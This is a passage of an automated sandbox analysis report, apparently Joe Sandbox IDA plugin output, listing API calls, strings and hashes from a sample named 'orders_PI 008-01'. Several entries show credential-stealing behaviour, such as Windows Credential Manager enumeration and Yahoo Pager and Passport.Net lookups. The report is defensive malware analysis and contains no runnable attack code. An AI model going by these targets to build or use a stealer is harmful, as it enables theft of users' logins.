                                        • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                        APIs
                                        • _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408E31
                                          • Part of subcall function 00409240: _itoa.MSVCRT ref: 00409261
                                        • strlen.MSVCRT ref: 00408E4F
                                        • LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                        • memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,75570A60), ref: 00408EBE
                                          • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408D5C
                                          • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408D7A
                                          • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408D98
                                          • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408DA8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                        • String ID: strings
                                        • API String ID: 4036804644-3030018805
                                        • Opcode ID: fb972dfd3e57adfc3ba40d615c3f9c5d1a1752d68bd78c6c00ac9518cee6e209
                                        • Instruction ID: 8088189cea062d7f30cfe1d816b9e84d6c9af13e32ba145f50863190e1f773ff
                                        • Opcode Fuzzy Hash: fb972dfd3e57adfc3ba40d615c3f9c5d1a1752d68bd78c6c00ac9518cee6e209
                                        • Instruction Fuzzy Hash: 4B3170B1101722AFD715DB15ED41E733766E7803067124A3FE981972A3CB39E8A1CB9E
                                        APIs
                                          • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                          • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                          • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                          • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                        • strlen.MSVCRT ref: 0040F7BE
                                        • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                        • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                        • String ID: Passport.Net\*
                                        • API String ID: 2329438634-3671122194
                                        • Opcode ID: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                        • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                        • Opcode Fuzzy Hash: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                        • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                        APIs
                                          • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                        • memset.MSVCRT ref: 0040330B
                                        • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                        • strchr.MSVCRT ref: 0040335A
                                          • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                        • strlen.MSVCRT ref: 0040339C
                                          • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                        • String ID: Personalities
                                        • API String ID: 2103853322-4287407858
                                        • Opcode ID: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                        • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                        • Opcode Fuzzy Hash: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                        • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                        APIs
                                        • memset.MSVCRT ref: 00444573
                                          • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                          • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValuememset
                                        • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                        • API String ID: 1830152886-1703613266
                                        • Opcode ID: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                        • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                        • Opcode Fuzzy Hash: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                        • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                        APIs
                                        • GetLastError.KERNEL32(?), ref: 00406D87
                                        • sprintf.MSVCRT ref: 00406DAF
                                        • MessageBoxA.USER32(00000000,?,Error,00000030), ref: 00406DC8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ErrorLastMessagesprintf
                                        • String ID: Error$Error %d: %s
                                        • API String ID: 1670431679-1552265934
                                        • Opcode ID: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                        • Instruction ID: a7eabb7ac59324d00fe13b249bdc4a7432a02f94c8438c44d3dfd779c6ab1540
                                        • Opcode Fuzzy Hash: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                        • Instruction Fuzzy Hash: AEF0A77A8001086BDB10A7A4DC05FA676BCBB44344F1500B6B945F2151EA74DA058F98
                                        APIs
                                        Strings
                                        • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                        • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                        • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                        • API String ID: 3510742995-272990098
                                        • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                        • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                                        • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                        • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID: H
                                        • API String ID: 2221118986-2852464175
                                        • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                        • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                        • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                        • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                        • API String ID: 3510742995-3170954634
                                        • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                        • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                        • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                        • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                        APIs
                                          • Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C
                                        • memcmp.MSVCRT(?,?,00000004,00000000,?,?,0041DE5E,?,?,?,?,00436073), ref: 0041DBAE
                                        • memcmp.MSVCRT(?,SQLite format 3,00000010,00000000,?,?,0041DE5E,?,?,?), ref: 0041DBDB
                                        • memcmp.MSVCRT(?,@ ,00000003,?,?,?,00000000,?,?,0041DE5E,?,?,?), ref: 0041DC47
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcmp$memcpy
                                        • String ID: @ $SQLite format 3
                                        • API String ID: 231171946-3708268960
                                        • Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                        • Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
                                        • Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                        • Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$memset
                                        • String ID: winWrite1$winWrite2
                                        • API String ID: 438689982-3457389245
                                        • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                        • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                        • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                        • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpymemset
                                        • String ID: winRead
                                        • API String ID: 1297977491-2759563040
                                        • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                        • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                        • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                        • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                        APIs
                                        • memset.MSVCRT ref: 0044955B
                                        • memset.MSVCRT ref: 0044956B
                                        • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                        • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpymemset
                                        • String ID: gj
                                        • API String ID: 1297977491-4203073231
                                        • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                        • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                        • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                        • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                        APIs
                                          • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                          • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,`Wu,00000000,?,?,0040A7BE,00000001,0044CBC0,75570A60), ref: 00406D4D
                                        • memset.MSVCRT ref: 0040AB9C
                                          • Part of subcall function 00411004: memcpy.MSVCRT(?,<,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                          • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                          • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                        • sprintf.MSVCRT ref: 0040ABE1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                        • String ID: <%s>%s</%s>$</item>$<item>
                                        • API String ID: 3337535707-2769808009
                                        • Opcode ID: 94fb3ee970197c35f89b73c5c9c871d1a7be37581e6fd1bc9edd3009dd58cb65
                                        • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                                        • Opcode Fuzzy Hash: 94fb3ee970197c35f89b73c5c9c871d1a7be37581e6fd1bc9edd3009dd58cb65
                                        • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                                        APIs
                                        • GetParent.USER32(?), ref: 004090C2
                                        • GetWindowRect.USER32(?,?), ref: 004090CF
                                        • GetClientRect.USER32(00000000,?), ref: 004090DA
                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                        • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Window$Rect$ClientParentPoints
                                        • String ID:
                                        • API String ID: 4247780290-0
                                        • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                        • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                        • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                        • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                        APIs
                                        • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                          • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                          • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                        • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                          • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                          • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                          • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                          • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                        • SetCursor.USER32(?,?,0040CBD2), ref: 0040B9F9
                                        • SetFocus.USER32(?,?,?,0040CBD2), ref: 0040BA0B
                                        • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                        • String ID:
                                        • API String ID: 2374668499-0
                                        • Opcode ID: c223344c3a39cb50a824543c0933464b2b2e3202265bd74e385ec46d38a17b1f
                                        • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                        • Opcode Fuzzy Hash: c223344c3a39cb50a824543c0933464b2b2e3202265bd74e385ec46d38a17b1f
                                        • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                        APIs
                                        • memset.MSVCRT ref: 0040AD5B
                                        • memset.MSVCRT ref: 0040AD71
                                          • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                          • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,`Wu,00000000,?,?,0040A7BE,00000001,0044CBC0,75570A60), ref: 00406D4D
                                          • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                          • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                        • sprintf.MSVCRT ref: 0040ADA8
                                        Strings
                                        • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AD76
                                        • <%s>, xrefs: 0040ADA2
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                        • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                        • API String ID: 3699762281-1998499579
                                        • Opcode ID: f08f26e7c6bf1a33ee1b85fc51aa9ff2daee10922a246ae1c01303c1338e46c2
                                        • Instruction ID: d8254de8a9900f2911fb5d1c0b13fc0cc865a5027b69882d7a9a790f368f6919
                                        • Opcode Fuzzy Hash: f08f26e7c6bf1a33ee1b85fc51aa9ff2daee10922a246ae1c01303c1338e46c2
                                        • Instruction Fuzzy Hash: 49012B7294012877E721A719CC46FDABB6C9F54304F0500F7B50DF3082DBB8AB508BA4
                                        APIs
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75570A60,?,00000000), ref: 00409A3E
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75570A60,?,00000000), ref: 00409A4C
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75570A60,?,00000000), ref: 00409A5D
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75570A60,?,00000000), ref: 00409A74
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75570A60,?,00000000), ref: 00409A7D
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??3@
                                        • String ID:
                                        • API String ID: 613200358-0
                                        • Opcode ID: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                        • Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
                                        • Opcode Fuzzy Hash: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                        • Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
                                        APIs
                                          • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75570A60,?,00000000), ref: 00409A3E
                                          • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75570A60,?,00000000), ref: 00409A4C
                                          • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75570A60,?,00000000), ref: 00409A5D
                                          • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75570A60,?,00000000), ref: 00409A74
                                          • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75570A60,?,00000000), ref: 00409A7D
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
                                        • free.MSVCRT ref: 00409B00
                                          • Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??3@$free
                                        • String ID:
                                        • API String ID: 2241099983-0
                                        • Opcode ID: 2269fc206d2d283b797854ae73677064badd7dde056db72ab5a07573cc1b8c0d
                                        • Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
                                        • Opcode Fuzzy Hash: 2269fc206d2d283b797854ae73677064badd7dde056db72ab5a07573cc1b8c0d
                                        • Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE
                                        APIs
                                          • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                          • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                          • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                        • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                        • GetSysColor.USER32(00000005), ref: 004107A6
                                        • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                        • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                        • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                        Memory Dump Source
